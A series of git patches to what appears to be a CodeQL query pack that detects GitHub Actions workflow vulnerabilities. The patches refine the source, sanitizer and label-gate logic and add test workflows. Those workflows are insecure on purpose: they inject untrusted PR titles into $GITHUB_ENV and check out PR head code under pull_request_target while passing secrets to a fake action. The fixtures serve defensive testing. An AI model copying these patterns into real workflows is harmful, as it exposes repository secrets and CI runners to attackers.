abstract class Job extends AstNode instanceof JobImpl { Permissions getPermissions() { result = super.getPermissions() } - Event getATriggerEvent() { result = super.getATriggerEvent() } - Strategy getStrategy() { result = super.getStrategy() } string getARunsOnLabel() { result = super.getARunsOnLabel() } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 67ef99e0fc87..ce6db22636cc 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -111,6 +111,11 @@ abstract class AstNodeImpl extends TAstNode { result = this.getEnclosingCompositeAction().getACallerJob() } + /** + * Gets and Event triggering this node. + */ + EventImpl getATriggerEvent() { result = this.getEnclosingJob().getATriggerEvent() } + /** * Gets the enclosing Step. */ @@ -447,7 +452,7 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { ) } - EventImpl getATriggerEvent() { result = this.getACallerJob().getATriggerEvent() } + override EventImpl getATriggerEvent() { result = this.getACallerJob().getATriggerEvent() } } class WorkflowImpl extends AstNodeImpl, TWorkflowNode { @@ -486,7 +491,7 @@ class WorkflowImpl extends AstNodeImpl, TWorkflowNode { PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } /** Gets the trigger event that starts this workflow. */ - EventImpl getATriggerEvent() { this.getOn().getAnEvent() = result } + override EventImpl getATriggerEvent() { this.getOn().getAnEvent() = result } /** Gets the strategy for this workflow. */ StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } @@ -918,7 +923,7 @@ class JobImpl extends AstNodeImpl, TJobNode { StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } /** Gets the trigger event that starts this workflow. */ - EventImpl getATriggerEvent() { + override EventImpl getATriggerEvent() { if this.getEnclosingWorkflow() instanceof ReusableWorkflowImpl then result = this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().getATriggerEvent() @@ -1174,6 +1179,8 @@ class StepImpl extends AstNodeImpl, TStepNode { result = super.getEnclosingJob() } + override EventImpl getATriggerEvent() { result = this.getEnclosingJob().getATriggerEvent() } + EnvImpl getEnv() { result.getNode() = n.lookup("env") } /** Gets the ID of this step, if any. */ diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index e0d46c7196d5..0dca5bf45fb4 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -91,7 +91,7 @@ class GitCommandSource extends RemoteFlowSource, CommandSource { uses.getCallee() = "actions/checkout" and exists(uses.getArgument("ref")) and not uses.getArgument("ref").matches("%base%") and - uses.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() + uses.getATriggerEvent().getName() = checkoutTriggers() ) or checkout instanceof GitMutableRefCheckout @@ -239,7 +239,7 @@ private class CheckoutSource extends RemoteFlowSource, FileSource { uses.getCallee() = "actions/checkout" and exists(uses.getArgument("ref")) and not uses.getArgument("ref").matches("%base%") and - uses.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() + uses.getATriggerEvent().getName() = checkoutTriggers() ) or this.asExpr() instanceof GitMutableRefCheckout diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 6293e4d6f3db..9b50a14bca2c 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -57,7 +57,7 @@ abstract class ControlCheck extends AstNode { // The check is effective against the event and category this.protectsCategoryAndEvent(category, event.getName()) and // The check can be triggered by the event - this.getEnclosingJob().getATriggerEvent() = event + this.getATriggerEvent() = event } predicate dominates(AstNode node) { diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index 5850aa91e6e1..e6cc0d06a466 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -30,7 +30,7 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { uses.getCallee() = "actions/checkout" and exists(uses.getArgument("ref")) and not uses.getArgument("ref").matches("%base%") and - uses.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() + uses.getATriggerEvent().getName() = checkoutTriggers() ) or step instanceof GitMutableRefCheckout diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index ea3f4c3c269f..01da214b6eaa 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -13,7 +13,7 @@ string checkoutTriggers() { */ private module ActionsMutableRefCheckoutConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - source.asExpr().getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and + source.asExpr().getATriggerEvent().getName() = checkoutTriggers() and ( // remote flow sources source instanceof ArtifactSource @@ -79,7 +79,7 @@ module ActionsMutableRefCheckoutFlow = TaintTracking::Global Date: Wed, 23 Oct 2024 10:37:33 +0200 Subject: [PATCH 614/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 5cf09c3601f2..608e186ffcd1 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.73 +version: 0.1.74 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 25486553ea8b..cdd396f985c6 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.73 +version: 0.1.74 groups: [actions, queries] suites: codeql-suites extractor: javascript From c9bb42a46ce043675aa1431667e2c0297733803a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 12:14:20 +0200 Subject: [PATCH 615/707] Enforce a checkout kind of trigger to consider gh pr/gh api ... pulls as a source of untrusted data --- ql/lib/codeql/actions/dataflow/FlowSources.qll | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 0dca5bf45fb4..7dfdc42b05e2 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -129,7 +129,13 @@ class GhCLICommandSource extends RemoteFlowSource, CommandSource { run.getScript().getAStmt() = cmd and cmd.indexOf("gh ") = 0 and untrustedGhCommandDataModel(cmd_regex, flag) and - cmd.regexpMatch(cmd_regex + ".*") + cmd.regexpMatch(cmd_regex + ".*") and + ( + cmd.regexpMatch(".*\\b(pr|pulls)\\b.*") and + run.getATriggerEvent().getName() = checkoutTriggers() + or + not cmd.regexpMatch(".*\\b(pr|pulls)\\b.*") + ) ) } From fef37b6025485c0ba0f80f1c07a62fafabdb6b1c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 12:15:26 +0200 Subject: [PATCH 616/707] Remove pull_request from context event map so that accesss to github.event.pull_request are not considered a source for pull_request triggers --- ql/lib/ext/config/context_event_map.yml | 4 ---- ql/lib/ext/config/externally_triggereable_events.yml | 1 - 2 files changed, 5 deletions(-) diff --git a/ql/lib/ext/config/context_event_map.yml b/ql/lib/ext/config/context_event_map.yml index a5e8ced2e9ed..35ccafc5beed 100644 --- a/ql/lib/ext/config/context_event_map.yml +++ b/ql/lib/ext/config/context_event_map.yml @@ -17,10 +17,6 @@ extensions: - ["issue_comment", "github.event.changes"] - ["gollum", "github.event.pages"] - ["gollum", "github.event.changes"] - - ["merge_group", "github.event.merge_group"] - - ["pull_request", "github.event.pull_request"] - - ["pull_request", "github.head_ref"] - - ["pull_request", "github.event.changes"] - ["pull_request_comment", "github.event.comment"] - ["pull_request_comment", "github.event.pull_request"] - ["pull_request_comment", "github.head_ref"] diff --git a/ql/lib/ext/config/externally_triggereable_events.yml b/ql/lib/ext/config/externally_triggereable_events.yml index c3481c1cca5c..7d40620e9139 100644 --- a/ql/lib/ext/config/externally_triggereable_events.yml +++ b/ql/lib/ext/config/externally_triggereable_events.yml @@ -9,7 +9,6 @@ extensions: - ["watch"] - ["issue_comment"] - ["issues"] - - ["pull_request"] # non-privileged - ["pull_request_comment"] - ["pull_request_review"] - ["pull_request_review_comment"] From 315ffdff8d64e99fa6a247c7fd21f9da92d4607d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 12:15:54 +0200 Subject: [PATCH 617/707] Improve env var injection sanitizers --- .../actions/security/EnvVarInjectionQuery.qll | 49 ++++++++++++------- 1 file changed, 30 insertions(+), 19 deletions(-) diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 99e9537a857d..656ea1207b51 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -10,7 +10,7 @@ string sanitizerCommand() { result = [ "tr\\s+(-d\\s*)?('|\")?.n('|\")?", // tr -d '\n' ' ', tr '\n' ' ' - "tr\\s+-cd\\s+.*:alpha:", // tr -cd '[:alpha:_]' + "tr\\s+-cd\\s+.*:al(pha|num):", // tr -cd '[:alpha:_]' "(head|tail)\\s+-n\\s+1" // head -n 1, tail -n 1 ] } @@ -55,18 +55,23 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { * echo "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV */ class EnvVarInjectionFromCommandSink extends EnvVarInjectionSink { + CommandSource inCommand; + string injectedVar; + string command; + EnvVarInjectionFromCommandSink() { - exists(CommandSource source, Run run, string var | - this.asExpr() = source.getEnclosingRun().getScript() and - run = source.getEnclosingRun() and - run.getScript().getACmdReachingGitHubEnvWrite(source.getCommand(), var) and + exists(Run run | + this.asExpr() = inCommand.getEnclosingRun().getScript() and + run = inCommand.getEnclosingRun() and + run.getScript().getACmdReachingGitHubEnvWrite(inCommand.getCommand(), injectedVar) and ( - not run.getScript().getACmdReachingGitHubEnvWrite(_, var) + // the source flows to the injected variable without any command in between + not run.getScript().getACmdReachingGitHubEnvWrite(_, injectedVar) and + command = "" or - exists(string sanitizer | - run.getScript().getACmdReachingGitHubEnvWrite(sanitizer, var) and - not exists(sanitizer.regexpFind(sanitizerCommand(), _, _)) - ) + // the source flows to the injected variable with a command in between + run.getScript().getACmdReachingGitHubEnvWrite(command, injectedVar) and + not command.regexpMatch(".*" + sanitizerCommand() + ".*") ) ) } @@ -81,18 +86,24 @@ class EnvVarInjectionFromCommandSink extends EnvVarInjectionSink { * echo "FOO=$BODY" >> $GITHUB_ENV */ class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { + string inVar; + string injectedVar; + string command; + EnvVarInjectionFromEnvVarSink() { - exists(Run run, string var_name, string var | - exists(run.getInScopeEnvVarExpr(var_name)) and + exists(Run run | run.getScript() = this.asExpr() and - run.getScript().getAnEnvReachingGitHubEnvWrite(var_name, var) and + exists(run.getInScopeEnvVarExpr(inVar)) and + run.getScript().getAnEnvReachingGitHubEnvWrite(inVar, injectedVar) and ( - not run.getScript().getACmdReachingGitHubEnvWrite(_, var) + // the source flows to the injected variable without any command in between + not run.getScript().getACmdReachingGitHubEnvWrite(_, injectedVar) and + command = "" or - exists(string sanitizer | - run.getScript().getACmdReachingGitHubEnvWrite(sanitizer, var) and - not exists(sanitizer.regexpFind(sanitizerCommand(), _, _)) - ) + // the source flows to the injected variable with a command in between + run.getScript().getACmdReachingGitHubEnvWrite(_, injectedVar) and + run.getScript().getACmdReachingGitHubEnvWrite(command, injectedVar) and + not command.regexpMatch(".*" + sanitizerCommand() + ".*") ) ) } @@ -122,7 +133,7 @@ class EnvVarInjectionFromMaDSink extends EnvVarInjectionSink { private module EnvVarInjectionConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource and - not source.(RemoteFlowSource).getSourceType() = "branch" + not source.(RemoteFlowSource).getSourceType() = ["branch", "username"] } predicate isSink(DataFlow::Node sink) { sink instanceof EnvVarInjectionSink } From 43211d3286372f83747258215fb225e6c229a8ca Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 12:16:02 +0200 Subject: [PATCH 618/707] Update tests --- .../CWE-077/.github/workflows/test17.yml | 36 +++++++++++++++++ .../CWE-077/.github/workflows/test18.yml | 32 +++++++++++++++ .../CWE-077/.github/workflows/test19.yml | 40 +++++++++++++++++++ .../CWE-094/.github/workflows/test20.yml | 19 +++++++++ .../CWE-094/CodeInjectionCritical.expected | 1 - .../CWE-094/CodeInjectionMedium.expected | 2 - 6 files changed, 127 insertions(+), 3 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test17.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test18.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test19.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test17.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test17.yml new file mode 100644 index 000000000000..dbf8c94b308f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test17.yml @@ -0,0 +1,36 @@ +on: + push: + branches: [main] + workflow_dispatch: + inputs: + pypi: + type: boolean + description: Publish + +jobs: + publish: + runs-on: ubuntu-latest + permissions: + id-token: write + steps: + - name: Checkout code + uses: actions/checkout@v4 + with: + token: ${{ secrets._GITHUB_TOKEN }} + - name: Extract PR Details + env: + GH_TOKEN: ${{ secrets._GITHUB_TOKEN }} + run: | + # Check if the event is a pull request or pull_request_target + if [ "${{ github.event_name }}" = "pull_request" ] || [ "${{ github.event_name }}" = "pull_request_target" ]; then + PR_NUMBER=${{ github.event.pull_request.number }} + PR_TITLE=$(gh pr view $PR_NUMBER --json title --jq '.title') + else + # Use gh to find the PR associated with the commit + COMMIT_SHA=${{ github.event.after }} + PR_JSON=$(gh pr list --search "${COMMIT_SHA}" --state merged --json number,title --jq '.[0]') + PR_NUMBER=$(echo $PR_JSON | jq -r '.number') + PR_TITLE=$(echo $PR_JSON | jq -r '.title') + fi + echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_ENV + echo "PR_TITLE=$PR_TITLE" >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test18.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test18.yml new file mode 100644 index 000000000000..1c4b1e863122 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test18.yml @@ -0,0 +1,32 @@ +on: + schedule: + - cron: '0 0 * * *' + pull_request: + types: [ opened, synchronize, reopened ] + branches: ["master", "*-rc"] + workflow_dispatch: + +jobs: + tests: + runs-on: ubuntu-latest + steps: + - name: Checkout Repository + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + + - name: Set Branch Variables + id: set-branch-variables + env: + github_event_pull_request_head_repo_owner_login: ${{ github.event.pull_request.head.repo.owner.login }} + github_repository_owner: ${{ github.repository_owner }} + run: | + # Set the Repo Owner + REPO_OWNER="${github_event_pull_request_head_repo_owner_login:-$github_repository_owner}" + echo "REPO_OWNER=$REPO_OWNER" >> $GITHUB_ENV + - name: Sanitize Github Variables + id: sanitize-github-variables + env: + GITHUB_EVENT_PULL_REQUEST_TITLE: ${{ github.event.pull_request.title }} + run: | + # Delete non-alphanumeric characters and limit to 75 chars which is the branch title limit in GitHub + SAFE_PULL_REQUEST_TITLE=$(echo "${GITHUB_EVENT_PULL_REQUEST_TITLE}" | tr -cd '[:alnum:]_ -' | cut -c1-75) + echo "SAFE_PULL_REQUEST_TITLE=$SAFE_PULL_REQUEST_TITLE" >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test19.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test19.yml new file mode 100644 index 000000000000..3b3b4b99ca10 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test19.yml @@ -0,0 +1,40 @@ +on: + pull_request: + workflow_dispatch: + +jobs: + build: + if: ${{ github.repository_owner == 'test' }} + runs-on: ubuntu-latest + steps: + - name: Get the appropriate Endo branch + id: branch + uses: actions/github-script@v7 + with: + result-encoding: string + script: |- + let branch = 'NOPE'; + if (context.payload.pull_request) { + const { body } = context.payload.pull_request; + const regex = /^\#endo-branch:\s+(\S+)/m; + const result = regex.exec(body); + if (result) { + branch = result[1]; + } + } + return branch; + - name: check out + id: checkout + if: steps.branch.outputs.result != 'NOPE' + uses: actions/checkout@v4 + with: + repository: test/test + path: ./tmp + ref: ${{ steps.branch.outputs.result }} + clean: 'false' + submodules: 'true' + persist-credentials: false + + - name: Find Netlify site ID + run: | + echo "NETLIFY_SITE_ID=$(cat COVERAGE_NETLIFY_SITE_ID)" >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml new file mode 100644 index 000000000000..27d8a666fc9e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml @@ -0,0 +1,19 @@ + +on: [ workflow_dispatch, pull_request ] +jobs: + test: + runs-on: ubuntu-20.04 + steps: + - name: Preliminary Information + run: | + echo "The job was automatically triggered by a ${{ github.event_name }} event." + echo "This job is now running on a ${{ runner.os }} server hosted by GitHub!" + echo "The name of your branch is ${{ github.ref }} and your repository is ${{ github.repository }}." + echo " " + echo "github.ref = ${{ github.ref }}" + echo "github.sha = ${{ github.sha }}" + echo "github.event.pull_request.head.ref = ${{ github.event.pull_request.head.ref }}" + echo "github.event.pull_request.head.sha = ${{ github.event.pull_request.head.sha }}" + echo "github.event.pull_request.base.ref = ${{ github.event.pull_request.base.ref }}" + echo "github.event.pull_request.base.sha = ${{ github.event.pull_request.base.sha }}" + echo " " diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 8a134a6f7ef3..dd9836805bd8 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -360,7 +360,6 @@ nodes | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | -| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 6afef323ff01..4a561f26cb21 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -360,7 +360,6 @@ nodes | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | -| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | @@ -628,7 +627,6 @@ subpaths | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | From 9a0795cc754de717b10dc7e5e2df4a6472d728ce Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 12:16:32 +0200 Subject: [PATCH 619/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 608e186ffcd1..1af220ff8fb7 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.74 +version: 0.1.75 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index cdd396f985c6..e8098e4f2156 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.74 +version: 0.1.75 groups: [actions, queries] suites: codeql-suites extractor: javascript From 674afc5eddb9202def8860e2bd474541c960b6a2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 15:48:42 +0200 Subject: [PATCH 620/707] Improve labelgate accuracy --- .../codeql/actions/security/ControlChecks.qll | 16 ++++++----- ...eckout.yml => label_trusted_checkout1.yml} | 0 .../workflows/label_trusted_checkout2.yml | 28 +++++++++++++++++++ .../CWE-829/UnpinnedActionsTag.expected | 6 ++-- .../UntrustedCheckoutCritical.expected | 13 ++++++--- 5 files changed, 50 insertions(+), 13 deletions(-) rename ql/test/query-tests/Security/CWE-829/.github/workflows/{label_trusted_checkout.yml => label_trusted_checkout1.yml} (100%) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 9b50a14bca2c..c73b06ae5302 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -159,14 +159,16 @@ abstract class CommentVsHeadDateCheck extends ControlCheck { /* Specific implementations of control checks */ class LabelIfCheck extends LabelCheck instanceof If { + string condition; + LabelIfCheck() { - // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') - // eg: github.event.label.name == 'safe to test' - exists( - normalizeExpr(this.getCondition()) - .regexpFind([ - "\\bgithub\\.event\\.pull_request\\.labels\\b", "\\bgithub\\.event\\.label\\.name\\b" - ], _, _) + condition = normalizeExpr(this.getCondition()) and + ( + // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') + condition.regexpMatch("(^|[^!])contains\\(\\s*github\\.event\\.pull_request\\.labels\\b.*") + or + // eg: github.event.label.name == 'safe to test' + condition.regexpMatch(".*\\bgithub\\.event\\.label\\.name\\s*==.*") ) } } diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout.yml rename to ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml new file mode 100644 index 000000000000..6014d08ed806 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml @@ -0,0 +1,28 @@ +on: + pull_request_target: + types: [labeled] + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + if: | + !contains(github.event.pull_request.labels.*.name, 'safe to test') + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: actions/setup-node@v1 + - run: | + npm install + npm build + + - uses: completely/fakeaction@v2 + with: + arg1: ${{ secrets.supersecret }} + + - uses: fakerepo/comment-on-pr@v1 + with: + message: | + Thank you! diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 58a000efac4f..0457fd7afaac 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -13,8 +13,10 @@ | .github/workflows/issue_comment_octokit.yml:13:15:13:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | | .github/workflows/issue_comment_octokit.yml:20:15:20:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | | .github/workflows/issue_comment_octokit.yml:104:15:104:43 | octokit/request-action@v2.0.2 | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | -| .github/workflows/label_trusted_checkout.yml:20:13:20:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | -| .github/workflows/label_trusted_checkout.yml:24:13:24:37 | fakerepo/comment-on-pr@v1 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout1.yml:20:13:20:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'label_trusted_checkout1.yml' step $@ uses 'completely/fakeaction' with ref 'v2', 